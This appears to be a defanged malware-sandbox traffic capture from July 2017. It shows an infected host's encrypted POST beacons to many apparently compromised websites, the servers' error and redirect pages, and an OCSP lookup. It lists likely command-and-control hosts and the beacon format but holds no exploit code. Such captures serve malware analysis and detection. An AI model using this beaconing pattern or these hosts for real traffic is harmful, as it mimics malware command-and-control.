..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;..<!-- a padding to disable MSIE and Chrome friendly error page
-->..<!-- a padding to disable MSIE and Chrome friendly error pa
ge -->..<!-- a padding to disable MSIE and Chrome friendly e

<<< skipped >>>

POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: merceorti.com
Connection: Keep-Alive
Cache-Control: no-cache

m6bKUEpo7nZVrXPyrbtRcw2YXe765bytHo8XDWkMc53ilDpMfXCGM2W G1ZA/OgVWWixAM8e9aOmhdbUWBLiIrUMeuxi0IrHNakyU7Vc9Nck3DZDrS2YsIJFXUtNQTuTw02r5Rs0josDfTRdi25EOeFYCYBSvY8Tv 3LrZ8e5K0b W7vV4wFuUa9T2dDFStz537iB3K 9ACdqHUE1aNUFh12eYGoGwpYcGtTpD9Rg1yLCdHNA1NkzMYTOOLx7lwwElIP7AyYReXggwv7U 6a91c1asWw4PGn5yaHWo8fp43FRfoCVBbww4TxZc5SEjsY8UFgrAiUE2NcYOIU4BjgP4Qx4DIHgddKXjZItJKDg7qT9AVMlx1a7laHC87l02eImktPI4ip/sjzpA5wsXzPntagTGoGPvYA8CrznBurFO2TkjlzkL2Ql IeW83cOQpYWFKg0FlgSxSME5gaAq94UTiZIvSG W3Ria5NZPdVMaThoEodtKp1hw==
HTTP/1.1 405 Not Allowed
Server: nginx/1.5.1
Date: Sat, 01 Jul 2017 11:17:07 GMT
Content-Type: text/html
Content-Length: 574
Connection: keep-alive
<html>..<head><title>405 Not Allowed</title>&l
t;/head>..<body bgcolor="white">..<center><h1>405
Not Allowed</h1></center>..<hr><center>nginx/
1.5.1</center>..</body>..</html>..<!-- a padding
to disable MSIE and Chrome friendly error page -->..<!-- a paddi
ng to disable MSIE and Chrome friendly error page -->..<!-- a pa
dding to disable MSIE and Chrome friendly error page -->..<!-- a
padding to disable MSIE and Chrome friendly error page -->..<!-
- a padding to disable MSIE and Chrome friendly error page -->..<
;!-- a padding to disable MSIE and Chrome friendly error page -->..
HTTP/1.1 405 Not Allowed..Server: nginx/1.5.1..Date: Sat, 01 Jul 2017
11:17:07 GMT..Content-Type: text/html..Content-Length: 574..Connection
: keep-alive..<html>..<head><title>405 Not Allowed&l
t;/title></head>..<body bgcolor="white">..<center>
;<h1>405 Not Allowed</h1></center>..<hr><ce
nter>nginx/1.5.1</center>..</body>..</html>..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;..<!-- a padding to disable MSIE and Chrome friendly error page
-->..<!-- a padding to disable MSIE and Chrome friendly error pa
ge -->..<!-- a padding to disable MSIE and Chrome friendly e

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 444
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lexjuridica.com
Connection: Keep-Alive
Cache-Control: no-cache

fPikCWii3nOjcV1tK6Kar9u9ZqZw5WFcHIzHmx   9WEIniSr9yeFP94hFbdCYLYaYyoyrJjN8B0JLYZBXxPsSSrhcCPS4D0riX9kaMMFGg8HWvMuJoQX CZMr8Isd6lcY1AZ4EyKGV6w47 WlqGkbZH5Ou0YrI8HWBwqtsIZmwI1PKI4O8dFlUhNqTG2aFr922JKehiHUJu4XagZdjGjnKJX4J YQ8yCcbQdy1KRpC7u1WXE7wxMT8aXDLmPbBc5aEqKKA IUgkr4McMarQRow41m 5Vs3q3MGVO3L6wSyLWzUzkEjPnqbIZ53j/ec1XTcDFMLjSFDNxNP2BS4vZq6crgRoXYXsLjYp543k4zYtlc4L10bk1pJWwkc987L5gG sxLeTTMvD5dxJqcFnWBUUm0JIG8UiIt4q/RexmP6NyonZchey5EBECuW1
HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:17:02 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_fcgid/2.3.6 Resin/3.1.10
Location: hXXp://lexjuridica.com/cgi-sys/suspendedpage.cgi
Content-Length: 424
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXp://lexjuridica.com/cgi-sys/suspendedpage.cgi">here</a&
gt;.</p>.<hr>.<address>Apache/2.2.24 (Unix) mod_ssl/
2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimite
d/1.4 mod_fcgid/2.3.6 Resin/3.1.10 Server at lexjuridica.com Port 80&l
t;/address>.</body></html>.
....



GET /cgi-sys/suspendedpage.cgi HTTP/1.1

Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lexjuridica.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:03 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_fcgid/2.3.6 Resin/3.1.10
Content-Length: 7314
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE html>.<html>.    <head>.    <meta http-
equiv="Content-type" content="text/html; charset=utf-8">. <me
ta http-equiv="Cache-control" content="no-cache">. <meta http
-equiv="Pragma" content="no-cache">. <meta http-equiv="Expire
s" content="0">. <meta name="viewport" content="width=device-
width, initial-scale=1.0">. <title>Account Suspended</t
itle>. <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com
/font-awesome/4.3.0/css/font-awesome.min.css">. <style type="
text/css">. body {. font-family: Arial, Helvetica
, sans-serif;. font-size: 14px;. line-height: 1.
428571429;. background-color: #ffffff;. color: #
2F3230;. padding: 0;. margin: 0;. }.
section {. display: block;. padding: 0;.
margin: 0;. }. .container {. margin-le
ft: auto;. margin-right: auto;. padding: 0 10px;
. }. .additional-info {. background-repeat: n
o-repeat;. background-color: #293A4A;. color: #F
FFFFF;. }. .additional-info-items {. padding:
20px;. min-height: 193px;. }. .info-heading
{. font-weight: bold;. text-align: left;.
word-break: break-all;. width: 100%;. }.
.status-reason {. font-size: 200%;. display

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 440
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ctr4process.org
Connection: Keep-Alive
Cache-Control: no-cache

NJHCEBJFFl83IBH6xaHXrhU4xsditpcIZhRr5mC248fyyz6OYM11kuD/NdCoAqsYCb9CxIbrGGVeRJ3jEgQXdFRBF6NoARGG7VMnVlf5T6P65PVJKzV06m/XQgVnvMCp/znH4VNIyJ8AkqH7wzCOzQb9Ci3r66MZBEQjkh/uqKq YdxvoFqvuB0l peaaN3906FbE0Valuo7/16xkoADCdgf2Iog5LDEap2fn7E1JhRUuYuxE VueC7qk3s/WcSh/1PVkKbo0Ajwh52Ow61vF3EBUfZ6H3kWFBRlPlE1mhqLRYMJKSZzTRVfMGRVgxQCpyBsOyNVsvORglKMoob K9O6mn3bDoy6Y9YXMxYRKiwiHCAAX3BeZ6p8yyj/N/k6Zre/DpjY5kjxQULUGbICSrUcxXs0NktB6p2 D6qTUbgq0A9EZg RI4k=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d6ae3e13104d590c73f2b7bab52e369be1498907799; expires=Sun, 01-Jul-18 11:16:39 GMT; path=/; domain=.ctr4process.org; HttpOnly
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 3778f45265bf820d-KBP
1753..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no
-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
; <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&
gt;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-
US"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>
.<title>Attention Required! | Cloudflare</title>..<meta
charset="UTF-8" />.<meta http-equiv="Content-Type" content="tex
t/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" con
tent="IE=Edge,chrome=1" />.<meta name="robots" content="noindex,
nofollow" />.<meta name="viewport" content="width=device-width,
initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="c
f_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" med
ia="screen,projection" />.<!--[if lt IE 9]><link rel="styl
esheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
type="text/css" media="screen,projection" /><![endif]-->.<
style type="text/css">body{margin:0;padding:0}</style>.<!-
-[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scri
pts/jquery.min.js"></script><![endif]-->.<!--[if gte
IE 10]><!--><script type="text/javascript" src="/cdn-cgi/
scripts/zepto.min.js"></script><!--<![endif]-->.<
script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"&

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 460
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: d4drmedia.com
Connection: Keep-Alive
Cache-Control: no-cache

SxLb3i 1kHKKoa8vTuCPZzirPMVFKYHy0/ kbBlP1 AULJHkRKU1FifsBLo3nfIUEg A9x3Z9SqvRJ75ePxUuUdil75m79bUqi4aVXpYUmqoFawn4xzXkvdlMbCfzQ6ZfBYGYJB/A4WUpFgX91gVsbod3krC IzxKy 1mLJj9HHEttiLclnePHNRoCUsWxtUHNR2NCnfxUg/Bb6Go43bIyAOALZkn2mJtUNX 0eE1wJIkxRIhejTRzA KSRXrh5QY6jls/6dYvFXbvWLrjuFAagHxKQ5CV5fyCg2XcM7LLJ gNK7iyMeSVl4OGo2U VNTO6cMkwGvMrQuq12sOjpI1E8Yir52b/etC9vFhvQyZxII4dtSn8H7d4ymIvXaNO5mSvTzYGpSn0nKRmmQL9SjcpNsd2BhwC/CCMTmUCQ4uxhndDCFWQWsPN9RGkpgurYu7gCe1lSFA==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:05 GMT
Server: Apache
Keep-Alive: timeout=5, max=9
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
c6 ..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML
><HEAD>.<TITLE>403 Forbidden</TITLE>.</HEAD>
;<BODY>.<H1>Forbidden</H1>.You don't have permission
to access /.on this server.<P>.</BODY></HTML>...0..
HTTP/1.1 403 Forbidden..Date: Sat, 01 Jul 2017 11:17:05 GMT..Server: A
pache..Keep-Alive: timeout=5, max=9..Connection: Keep-Alive..Transfer-
Encoding: chunked..Content-Type: text/html; charset=iso-8859-1..c6 ..&
lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>&l
t;HEAD>.<TITLE>403 Forbidden</TITLE>.</HEAD><B
ODY>.<H1>Forbidden</H1>.You don't have permission to ac
cess /.on this server.<P>.</BODY></HTML>...0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: nori-k.com
Connection: Keep-Alive
Cache-Control: no-cache

zCdPngLlbXxysgf19WB0tIUNmTASPUc0VnPOnrxCQh3mVQTW5Vg478jVUSLusr4C2hWvQjvPQ7GU/IxKPFbDFB2G qkI8qTrrPoQGAyQk8dV6eoYdHwvZXKvfqqhzeaJ7HU1D9sTX6Bwpg8Hu2sqnd7NYXPP9QTbvxoJnEd4NLHwJrhoFtIN2Jf6HZimwzRiRX9mJy58qqwnklfMaR2UEGL4I7Mvmsz/ldaSlWFQAz6ajteMBIREgzkVHqcg7PdYvZ4voxKh73kHTMiLXBx6fVHJZfP4oUcZAECR/BuMW9HKeKBt6EEC57xWdzdIZPI5vbq2L6g8UMzF rPDlyjqDoS4nJPxjc9wR4K49KiM9qc0xL2BUPPekU5Suszo0Xvd PfkqqiKUp6ztIwMZGiLY6 ymn7SprIddrz1TdRat9KK2CdHTt5wJbBsGZZbL42Eaz7VTDSNISTzRCX4t/ccZFeKFkEOJ8AWevySvYi5HA7Rlb9KZoM/xpY=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:14 GMT
Content-Type: text/html
Content-Length: 10148
Connection: keep-alive
Last-Modified: Sun, 10 Apr 2005 16:24:00 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Apache
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<head>..<meta http-equiv="content-type" content="text/html;c
harset=x-sjis">..<meta name="generator" content="Adobe GoLive 5"
>..<meta name="keywords" content=".K.[.f.j...O,........,......,.
...,.t.....[,gardening,...|,..,.A..,...|,.^.l....,...S..,........,...^
,.J....,....">..<meta name="description" content="...S...E......
.........K.[.f.j...O...T.C.g.B.^.l.....E.......E.......E...A.E...|.E.A
.......c...........R............">..<link href="style_garden11.c
ss" type="text/css" rel="stylesheet">..<title>...........K.[.
f.j...O.c........ ...S.. ...... ...........l....</title>..<st
yle type="text/css">.<!--.BODY { background: url(g_index/top_w
all_flower01.jpg) no-repeat fixed 0% 0%; position: relative }.-->.&
lt;/style>..<script language="avaScript"> .w=window.open.("ht
tp://nori-k.com/special_flame.html",."special_flame",."width=260,heigh
t=520") </script>..<script language="JavaScript">.<!--.
function Open09() {window.open("hXXp://nori-k.com/mailform_geocities/c
ontact.html","09","toolbar=0,location=0,directories=0,status=1,menubar
=0,scrollbars=yes,resizable=no,Width=600,Height=500");}.function Open1
0() {window.open("hXXp://nori-k.com/special_flame.html","10","toolbar=
0,location=0,directories=0,status=1,menubar=0,scrollbars=yes,resizable
=no,Width=260,Height=520");}.//-->.</script>.</head>..&
lt;body link="#666666" vlink="#666666" alink="#009999" leftmargin=

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.theprintinghouseltd.co.uk
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 01 Jul 2017 11:16:52 GMT
Content-Length: 40591
..<!DOCTYPE html>..<html lang="en">..<head>..    <
;meta charset="utf-8">.. <meta http-equiv="X-UA-Compatible" c
ontent="IE=edge">.. <meta name="viewport" content="width=devi
ce-width, initial-scale=1">.. <title>Professional Worldwid
e Printing Service</title>..<meta name="description" content=
"Here at The Printing House we provide a Professional Printing Service
Worldwide for any custom design. See our site for all our custom prin
ting services.">..<meta name="keywords" content="Professional pr
inting,custom design,The Printing House">..<meta name="title" co
ntent="Professional Worldwide Printing Service">.. <meta prop
erty="og:locale" content="en_GB">.. <meta property="og:type"
content="website">.. <meta property="og:title" content="Profe
ssional Worldwide Printing Service">.. <meta property="og:des
cription" content="Here at The Printing House we provide a Professiona
l Printing Service Worldwide for any custom design. See our site for a
ll our custom printing services.">.. <meta property="og:url"
content="hXXp://VVV.theprintinghouseltd.co.uk/">.. <meta
property="og:image" content="hXXp://VVV.theprintinghouseltd.co.uk/medi
a/1014/c-developer-images-theprintinghouse-og.jpg">.. &l
t;meta property="og:image" content="hXXp://VVV.theprintinghouseltd.co.
uk/media/1014/c-developer-images-theprintinghouse-og.jpg">..
<meta property="og:image:type" content="image/jpg">.. &l

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: eyggroup.com
Connection: Keep-Alive
Cache-Control: no-cache

eLuoGpoRfGCm4FxavTTJSd0dOz KUZ0dbuXrANERglCSVpLhI bKv9BPOq0pALnV5anEhIPYHObp8OKFK8 Bq5evp4G6G471 NTeMnpw3sHvt1FePGAs2mtnVqz2WPCK/CLyMbBx3FPvXA1CJYQmmRvBvB/onD1vl1qWOL14qKr8ntbRGY8LPMGuCuOQHEB2yXrXnMs58CT06H 3K/dI8w5fqMkYsAZDzvnvuMHrKcOfbXrztEydz/7ERiBhJH75WsZYDuL 4HUwwQ9OhOmfL797p KaW02bToW9MfErv6Hmen5Rt3SijUodY7sXb m2zQb5ztXpp1MeHWGgidfP7R9MZYfpb2jhNZ7eUeLac LSrB/sIvA9bjmvE5eh4IjmMfYRZu9rkYPOFFsnqJ/j4CGrfm3Duc5AgJLuThDHO5jws/906twrnR4w5nZwtVAsnkxk1cNaYfRBBKU7DxyDfzwzsNgSVQ3Ne8M nQ1DnZ 1KM8Uuw==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:41 GMT
Server: Apache
X-Powered-By: PHP/5.6.25
Vary: Accept-Encoding
Cache-Control: max-age=0
Expires: Sat, 01 Jul 2017 11:16:41 GMT
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
7b5..<!doctype html>.<!--[if lt IE 7]> <html lang="en" 
class="no-js ie6 lt-ie9 lt-ie8 lt-ie7"> <![endif]--><!--[i
f IE 7]> <html lang="en" class="no-js ie7 lt-ie9 lt-ie8">
<![endif]--><!--[if IE 8]> <html lang="en" class="no
-js ie8 lt-ie9"> <![endif]--><!--[if gt IE 8]><!--&g
t;<html lang="en" class="no-js mti-loading mti-proximanw01reg-n4-lo
ading mti-proximanw01regit-n4-loading mti-proximanw01bold-n4-loading"
prefix="og: hXXp://ogp.me/ns#" style=""><!--<![endif]-->&l
t;!--[if gte IE 9]><style type="text/css">.gradient {filter:
none;}</style><![endif]--><head>..<meta http-equi
v="X-UA-Compatible" content="IE=edge,chrome=1">.<meta name="goog
le-site-verification" content="NrHcSPGibp34npYx_8pzv2bW0kGpK1rYDL_h9T7
yZWc" />.<meta name="viewport" content="width=device-width">.
<title>EYG Group quality manufacturer and installer of home impr
ovement products</title>.<meta name="pagedescription" content
="EYG Group, based in Hull East Yorkshire are quality manufacturer and
installer of home improvement products. With branches in Yorkshire an
d Lincolnshire" />.<meta property="og:locale" content="en_GB" /&
gt;.<meta property="og:type" content="website" />.<meta prope
rty="og:title" content="EYG Group quality manufacturer and installer o
f home improvement products" />.<meta property="og:description"
content="EYG Group, based in Hull East Yorkshire are quality manuf

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: unslp.edu.bo
Connection: Keep-Alive
Cache-Control: no-cache

u2cYrcSkunhkxXMh32mz0pdcnbT87MJYOCYBPEsKi6lUY oKUB1vZ/nz/DtEAlp2BFHWi/7sYq2DrO5t68v6L8ag9cH6ul3ojjm359UeA f8rAn5roUlN56I4rGJV6r9nFF0REvxLzmTU99aZpdusD w5ruAKOQFsMxrK8kDFiCyBKmthPXZkm fW7kESpAKhxJ3pvg0p3IkiUb1Lay mxrry0iuFqTKuMSLzlAdhm//VX7Nqerd5M7mEsyIvPK69DYF4xFEYC9r 3rHfV/kjgjhhT3MdDkRWvqulH7P61SPBCemeW2loXCy0L15tmNnev57SKDVfvrZU5AhkCpk9v8mSmzo7TLVpCmjslaw1md8IxrJpOrzoCoBLLDseUhTq5HL2heWFZQpDazXn9y6Wey48UfmVDZadMNtu0tSabeMEUHlDl7zMRsr4iGZs05q hHbPXeZ7Gbxrl1ywokqPLSCIx6ugnUkop6PGJcwfoK1UzJ4XX4=
HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:17:09 GMT
Server: Apache
Location: hXXps://unslp.edu.bo/401.shtml
Content-Length: 214
Keep-Alive: timeout=2, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXps://unslp.edu.bo/401.shtml">here</a>.</p>.<
;/body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 460
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: pixemia.com
Connection: Keep-Alive
Cache-Control: no-cache

3lpSx2p qpDP4/KATZrP2y23ezqaxjIwPje27WuKcHXErSettNcTJn4dvibnSB1nfw36uv6iKY8bGQeTCBgdJTdWPrkGNqIq1DORpkYSxbA/nz3Gq1oMu5IiQQFm1d26Ca2sTMfA2dJkIUtc3hmW5lHchhuyqNXzm0k6IAb4vsKgddsjgN A3OWFD/nGCOtz1ZyKCef9V3NQ2vQbtdPzDnFBt9rtBxNYdFOJ1dWgzB5SOpuBjhJiojTzg1oQQlb2krNJPYKDzVAKgAEyN1g6HXFS snQMZRVKLiTwfvdAeN4CGl465nQTMFPwLaL8FEBGUmIJALh2BWCNM1vZ4yk/sDxJ/UBXXHbPwMHMgpwTGUpejNZhDRkGjVNA6 WMb80ZQPPpFuLVT3tARsv2jbBB/kXJ3wfCc6uhir 0ol0ziCG07xVqlT6X2 FtkSyj5bUnKBRS6cT3DA=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:37 GMT
Server: Apache
Last-Modified: Tue, 14 Jun 2016 11:24:51 GMT
ETag: "6874-5353b40ea6785"
Accept-Ranges: bytes
Content-Length: 26740
Vary: Accept-Encoding
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"."htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<title>Jorg
e Mora Beneyto | Comercio Internacional</title>...<meta http-
equiv="content-type" content="text/html;charset=UTF-8" />..<meta
name="viewport" content="width=970,user-scalable=yes" />...<lin
k rel="stylesheet" type="text/css" media="all" href="css/style.css" /&
gt;...<!-- Including Puritan font from Google Web Fonts -->..<
;link href="hXXp://fonts.googleapis.com/css?family=Puritan:regular,it
alic,bold,bolditalic" rel="stylesheet" type="text/css" />...<!--
Including jQuery, Form and Form Validation Plugins -->..<script
src="hXXp://code.jquery.com/jquery-latest.js" type="text/javascript"&
gt;</script>..<script src="lib/js/jquery.form.js" type="text/
javascript"></script>..<script src="lib/js/jquery.validate
.min.js" type="text/javascript"></script>...<!-- Contact F
orm validation settings -->..<script src="lib/js/jquery.custom.c
ontact.validation.js" type="text/javascript"></script>...<
!-- Custom functions -->..<script src="lib/js/jquery.custom.mini
malme.js" type="text/javascript"></script>...<!-- Includin
g & Initializing tipsy (nicer tooltips) -->..<link rel="styleshe
et" type="text/css" href="lib/js/tipsy/stylesheets/tipsy.css" />..&
lt;script type="text/javascript" src="lib/js/tipsy/javascripts/jqu

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.denville.ca
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:17:06 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
03 Forbidden..Server: nginx..Date: Sat, 01 Jul 2017 11:17:06 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>403 Forbidden</title></hea
d>..<body bgcolor="white">..<center><h1>403 Forbi
dden</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 464
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: austriansurfing.at
Connection: Keep-Alive
Cache-Control: no-cache

qYUVQTCOGWDJJ4X2Q0sSL NEyFHY8OobZIhwDckDyDlxvCfEdtmvv eZ4XftkXYPLomykuDoHggRQp2scJ21gth8ruqYDPEJIXLHlROMyh5A4xrL4XvruqS/CWcRmYv2ZbgMJZj8BK7MDLVsm0n2GdFt/Mcty5bLqRgiPB4rlnR5TK7/nO0PXH/bvy8kolQTaOS yGsQuDYlT7t ZpZQ7zV5J8SbHHcv8Ps9 fld0wveYzBLx/7Lm1mEsO8asdyc49P7Lu5 XsYPjmWk 2ocu7CbMnWPEB0yZC14XCZ1GLMlLwAijBzCeqcWTBRxb22FGT19yS7IjhBT8jm3BPe SH4BX2PkvxJ7E8KJOTlUct/m64aAwoAwP3h30qcmNYZ/I/gLaoCo0PLgyp3RvX4GIuUcwd8XDKlAruIbJcU18uQRZ2rSzXc3eFj3b0JMQdd7M2Cd7Db6kiJO0lfN
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:40 GMT
Server: Apache
Location: hXXp://VVV.austriansurfing.at/
Cache-Control: max-age=0
Expires: Sat, 01 Jul 2017 11:16:40 GMT
Vary: Accept-Encoding
Content-Length: 238
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.austriansurfing.at/">here&
lt;/a>.</p>.</body></html>.HTTP/1.1 301 Moved Per
manently..Date: Sat, 01 Jul 2017 11:16:40 GMT..Server: Apache..Locatio
n: hXXp://VVV.austriansurfing.at/..Cache-Control: max-age=0..Expires:
Sat, 01 Jul 2017 11:16:40 GMT..Vary: Accept-Encoding..Content-Length:
238..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-T
ype: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF/
/DTD HTML 2.0//EN">.<html><head>.<title>301 Moved
Permanently</title>.</head><body>.<h1>Moved P
ermanently</h1>.<p>The document has moved <a href="http
://VVV.austriansurfing.at/">here</a>.</p>.</body>
</html>...


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/YHKj6JjF6UBieQioTYpFsuEriQQUtnf6aUhHn1MS1cLqBzJ2B9GXBxkCEBh39mVop4K7qftC2uROM9c= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: s.symcd.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1736
content-transfer-encoding: binary
Cache-Control: max-age=310891, public, no-transform, must-revalidate
Last-Modified: Wed, 28 Jun 2017 01:37:36 GMT
Expires: Wed, 5 Jul 2017 01:37:36 GMT
Date: Sat, 01 Jul 2017 11:17:24 GMT
Connection: keep-alive
0..........0..... .....0......0...0........t...~.v.....`..C.d..2017062
8013736Z0s0q0I0... ........?`r.....@by..M.E.. ....w.iHG.S.....2v......
..w.eh.....B..N3.....20170628013736Z....20170705013736Z0...*.H........
.....(F.5$..@.x....1...7....z.`..`.....sH.@G?8...NPz...V%.........q# E
(.5..=.>Q..N.D.T.....f.X....H......-9\....O.q.tQ.C.Gi...!.. .5...W.
...........t.,=.}.........TtB.....,.. v...._&.~B|H.r...f1}...I.}$^..QH
@.P.7.O .>?.l..*^.(^L(;Q..;.............(*...d>.....G.....0...0.
..0..........c..*.:Y......Yk`0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008 Ve
riSign, Inc. - For authorized use only1806..U.../VeriSign Universal Ro
ot Certification Authority0...161122000000Z..171214235959Z0..1.0...U..
..US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network11
0/..U...(Symantec Universal Root OCSP Responder 50.."0...*.H..........
...0..........F8$-..E....?.T....D...h..~...9.......0.....f@1...M...F..
e.5c.V.....r....ox.l..:t....,......6R..E.g...'oTB....`E 7...uz.;(B...~
